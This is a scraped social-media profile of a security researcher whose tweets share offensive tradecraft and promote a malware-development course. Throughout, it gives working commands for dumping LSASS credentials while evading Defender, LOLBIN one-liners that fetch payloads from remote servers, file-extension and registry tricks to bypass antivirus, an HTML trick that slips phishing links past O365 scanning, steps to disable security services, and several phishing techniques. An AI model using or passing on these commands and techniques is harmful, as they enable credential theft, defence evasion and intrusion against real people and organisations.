mr.d0x
@mrd0x
Followers
42K
Following
3K
Media
48
Statuses
1K
Security researcher | Co-founder https://t.co/QxBlzpa7Y4 | https://t.co/zqMXQRZRGl | https://t.co/Fq7WSqU9kI | https://t.co/eKezFcOEcL
Joined November 2020
MalDev Academy is ready!. Website: MaldevAcademy[.]com.Launch date: April 16th, 2023. - 32 Beginner modules.- 49 Intermediate modules.- 10 Advanced modules.- 20 in the works for updates in the next few months.- 65 Custom code samples. Very fair pricing, starting at 249$. @NUL0x4C.
167
266
863
I published a blog article detailing a phishing technique I called Browser in the Browser (BITB) Attack. It's very simple but can be very effective. I also published templates on my Github feel free to test them out.
112
1K
4K
If you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS.
48
1K
3K
Bypass Defender AV static detection:. If you name a malicious file DumpStack.log Defender doesn't scan it.
41
1K
3K
I'll be dropping a new phishing technique for stealing credentials & bypassing 2FA today. You do not want to miss this.
37
385
2K
Here I bypassed Defender AV by making:. eyb files as .exe . faq files as .dll. I'm sure this can work on other security solutions and for many other blacklisted techniques. (1/2)
27
508
2K
Chromium's application mode can be used to easily build realistic phishing desktop applications. Enjoy.
24
460
1K
Reminder that creating a memory dump of Outlook.exe not only produces access tokens but also potentially sensitive email content.
20
248
1K
LOLBIN to dump LSASS:. Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions. Binary: DumpMinitool.exe. The params are case sensitive.
14
311
932
Another way to download files using msedge/chrome:. [msedge.exe | chrome.exe] --headless --enable-logging --disable-gpu --dump-dom "
http://server/evil.b64.html" > out.b64. - Downloaded file should end with .html. - Binaries should be encoded.
5
345
897
Today I've launched I've been analyzing malware source code that utilizes WinAPIs and have been categorizing them. Please feel free to contribute as I know the current list is not exhaustive.
25
349
886
Living Off Trusted Sites: Attackers are using popular legitimate domains to conduct attacks (e.g. phishing). I've attempted to compile a list of legitimate domains that can be abused by attackers. As usual, feel free to contribute.
34
335
834
It seems that you can still completely bypass Defender AV's static detection using *.log files, only now you have to use DLLs instead of EXEs.
11
260
768
If you compose an email using the "Reply" function on O365 which has a link, intercept the request and add an extra empty href attribute then O365 won't scan the link anymore. <a href="phishing link">click</a> ==> junk.<a href="" href="phishing link">click</a> ==> inbox
10
241
748
For the past couple of months @NUL0x4C and I have been working on a module-based malware dev training course that covers various techniques in-depth. Its emphasis is on simplifying complex concepts & evasion. Every module contains highly commented custom code. Stay tuned!
37
158
749
Inserted attachments on OneNote can be directly downloaded. The domain used is onenoteonlinesync[.]onenote[.]com. 1. Insert a file attachment on a OneNote Notebook.2. Double click the inserted attachment and grab the direct download link. Added to
7
228
691
EvilSelenium - This project weaponizes Selenium to attack Chrome. Dump saved credentials, cookies, take (authenticated) screenshots, dump emails from gmail/o365 or chats from Whatsapp and exfiltrate & download files. ENJOY.
8
261
642
Twitter is great for sharing infosec related stuff, but it's also too dynamic and people may miss stuff. So every few months I'll link any interesting tweets I had made. Enjoy.
12
169
610
msedge kiosk mode + a fake Windows login page. Don't know if it's practical, but interesting for sure. msedge.exe --app="
http://example[.]com/index.html" --kiosk
8
124
585
Outlook attachments can be directly downloaded. 1. Compose an email.2. Attach a file (add .txt to the end if it's a restricted file type).3. Click on the file to download it and grab the link (attachment[.]outlook[.]live[.]net). Link is valid for ~15 minutes.
16
209
585
LOLBIN(s): mpiexec.exe & smpd.exe.Path: C:\Program Files\Microsoft MPI\Bin. mpiexec.exe spawns smpd.exe which then spawns an executable. Usage: mpiexec.exe -n 1 c:\path\to\binary.exe . (1/2)
2
221
568
explorer.exe can launch a browser and download a file. Append a harmless extension to the file then remove it after download. Default browser:.explorer.exe https://server/file.exe.txt. Edge:.explorer.exe microsoft-edge: https://server/file.exe.txt.
6
156
492
Abusing Google Drive's Email File Functionality for phishing. Enjoy!.
3
182
476
Anyone else aware that .asd files can contain macros? Literally just found out. Added to Filesec: .
6
138
438
WebView2 desktop applications have functionality that allows for JS to be injected into any website & for cookies to be stolen. In my new blog post I explore how it can be used by attackers and I provide working code. Enjoy!.
11
160
410
Demo:.Injecting a JS keylogger using WebView2 into login[.]microsoftonline[.]com. Better quality: Blog post:
10
142
382
Didn't have time to talk about the newly released TLDs last week, but here we go. File Archiver In The Browser: Emulating file archive software in the browser with a .zip domain for phishing.
11
143
377
Procdump dump lsass.Defender: Threat detected!. Sqldumper dump lsass.Defender: Sure, go right ahead!. btw dumping lsass with sqldumper.exe is not new, actually its quite old.
5
96
355
devinit.exe - Great MS signed tool with tons of useful commands but needs VS to run properly. I tested msi-install, it downloads a msi file to C:\Windows\Installer\ then installs it. devinit.exe run -t msi-install -i http://10.0.0.18/out.msi
4
114
345
LOLBIN: Microsoft.NodejsTools.PressAnyKey.exe. Execute a local binary or one from a file share. Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools
2
117
328
It's unfortunate to see how many people no longer share tools/research the same way as before. I believe funding researchers and developers is the way forward.
28
22
291
Procdump works against Defender with a simple rename. It quarantines the generated .dmp file but you have a few seconds to make a copy of it before it's removed. I've seen other security solutions that do this, try to copy the file quickly before it's removed.
8
88
281
I've create a simple Python script that converts executables generated with pe_to_shellcode to a format that works with cdb.exe. Useful for evasion & application whitelisting bypass.
0
117
270
Attempting to access protection history after detecting a malicious file with a really long name + path crashes Defender's UI lol.
7
45
257
Lol
2024-05-14 (Tuesday): #DarkGate activity. HTML file asks victim to paste script into a run window. Indicators available at #TimelyThreatIntel #Unit42ThreatIntel #Wireshark #InfectionTraffic
6
51
246
How much awareness is there around Context Menu Spoofing/Hijacking for persistence?. Here's hijacking SentinelOne's "Scan for threats" to run a command.
6
69
238
You can spoof almost everything in a Calendar invite by customizing an .ics file. I think this can definitely trick many users.
2
85
221
You should probably be aware of this technique. Custom Previews For Malicious Attachments.
2
86
207
I mentioned a few days ago that there's two LOLBIN binaries that do DLL injection. After re-checking the digital signature I don't believe they're considered LOLBINs (correct me if I'm wrong) but since they're interesting I'll share them anyway. (1/2)
2
74
202
Start Edge minimized, download file, delay a few seconds to allow download to complete and kill Edge. start /min msedge.exe https://server/file.exe.zip && timeout 3 && taskkill /IM "msedge.exe" /F. Modify file extension back to original after download.
5
70
205
"Although the code and the technique was copied from the mrd0x original blogpost dating back to 2022, the analysed document is currently only detected by one antivirus engine on VirusTotal (eScan) at the time of writing." 🤔.
2
46
192
Tampering with ForcePoint DLP.Write up on CVE-2022-27608 & CVE-2022-27609.
5
45
150
I'll be dropping two variations of a new initial access technique exclusively for @MalDevAcademy premium & lifetime users (in update 2 or update 3). Red teamers you'll be very happy. Blue teamers you'll want to have safeguards in place for this.
3
24
153
I actually didn't know the about the Windows Device Portal feature. Kernel & process dumps, process and network information, application management all with optional authentication? I'll take it.
2
36
141
All security solution vulns I previously found were too easily exploitable. In the newly posted Exploiting EDRs For Evasion module in @MalDevAcademy I demonstrated how changing a non-protected registry key prevents logs from arriving to the EDR console. Too easy.
5
21
131
Check out AtomLdr, something you'll be able to build after completing this training.
3
25
131
Havoc made the cut @C5pider 🎉.
Before we wrap up the year, it’s time to get out one last Kali release for 2023. Announcing Kali 2023.4! for a focus on the addition of Hyper-V support to Vagrant, ARM64 Cloud images, support for the Pi 5, and an update to Gnome 45. Check it out!
1
3
117
I guess this is their way of whitelisting their dump64.exe tool that comes with Microsoft Visual Studio.
1
10
114
20 new websites added to An interesting site added is feedproxy[.]google[.]com. I was not aware that it's being used in phishing attacks. Creds: @BushidoToken.
7
32
116
Outlook link preview spoofing. Either modify the HTML while sending it or insert a different link when it tries to fetch a preview of the site.
1
7
104
Since any file extension can be modified to become executable, wouldn't something like this mess with rules that look for "cmd.exe" spawning "powershell.exe" for example?
4
5
95
Just added a new batch of sites to Thanks to all the contributors. Will continue to add more.
1
20
96
For example, to make .eyb act as a .exe go to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb and modify it as shown in the image. (2/2)
4
14
96
I'll be disclosing a new LOLBIN this week on the @MalDevAcademy Discord channel that can be used for downloading files on the machine. Stay tuned!.
2
6
84
Hope you all enjoy it.
MaldevAcademy[.]com is now live!.
4
9
81
Hide your phishing link behind Google's domain. Thanks Google you're always adding some great "features".
0
35
81
Please make sure you're aware that this technique is not necessarily VNC specific. Of course it can work with any web-based remote access method (e.g. web-based RDP, TeamViewer etc). But I felt noVNC provided the most seamless experience to target users.
1
15
77
Another 30 APIs added to since yesterday. Thanks for all your support. Please continue submitting APIs I'll add them as soon as possible.
0
17
73
t[.]m1[.]email[.]samsung[.]com is being used to redirect users to phishing websites. Reference:
1
20
69
Finally had some time to push new APIs on Sorry for the delay and thanks to all contributors.
1
14
69
Since MS Teams now allows external users to message users within an organization, the Teams Abuse article may be worth a revisit. I also updated it to add a few more techniques.
1
19
71
I disabled multiple security solutions using a simple method which involves stopping/modifying the dependencies of the service. 1. sc qc <service> ==> check dependencies.2. sc qc <dependency> ==> stop it or attempt to modify it through the registry.
0
14
63
Why does it feel like we're asking for too much?.
All we want is a basic web browser with an ad blocker.
2
3
62
I really like 12ft[.]io which is used to bypass paywalls. But be aware that it can also be used to masquerade phishing links. Reference:
0
11
58
Sorry if the images are blurry on the blog post. They are available on the Github Repo in far better resolution:.
0
8
60
@Warlockobama That's the first thing that comes to mind for sure. But now users will have 3 thoughts when they notice this:. 1.Suspicious .2.Technical glitch .3.Intended "feature". Maybe if we're lucky our odds may just be the latter two.
1
4
57
I think this is a great example of how important it is to be conscious of what you put out there. The smallest things can potentially be used in ways you didn't expect.
5
6
46
Can confirm this works. Another way is to send an email saying "There's IT work going on you may receive a 2FA prompt, just accept it." Surprisingly it works.
0
8
42
Turns out args: 0,2,4 are useless and can be literally anything as long as args 1,3,5 are valid. Watch out for this if you're writing detection rules.
@mrd0x Example that works:. /DumpMinitool.exe 1 'dump6.txt' 2 660 3 Full.Dump minitool: Started with arguments 1 dump6.txt 2 660 3 Full.Output file: 'dump6.txt'.Process id: 660.Dump type: Full.Dumped process.
1
13
42
@techspence I only tested it with downloading and copying from a remote share. Using SMB is shown in the attached image. Also note that it's still subject to other methods of detection like behavior, heuristics etc.
1
1
41
@mythicalcmd @NUL0x4C This training is far more in-depth. Also its text-based not video-based. There's custom code (all commented) and exclusive tools shared on there. Here's an example of one module that covers a custom tool 'HellShell'.
2
5
42
@NinjaParanoid I feel like it’s a small part of the community but they’re just very loud and always seem to be morally and intellectually superior than everyone else.
2
0
40
I'll be disclosing a new LOLBIN this week on the @MalDevAcademy Discord channel that can be used for downloading files on the machine. Stay tuned!.
0
2
36
Thanks to all those contributing and sorry for the delay. => new extensions added. => new APIs added.
1
15
38
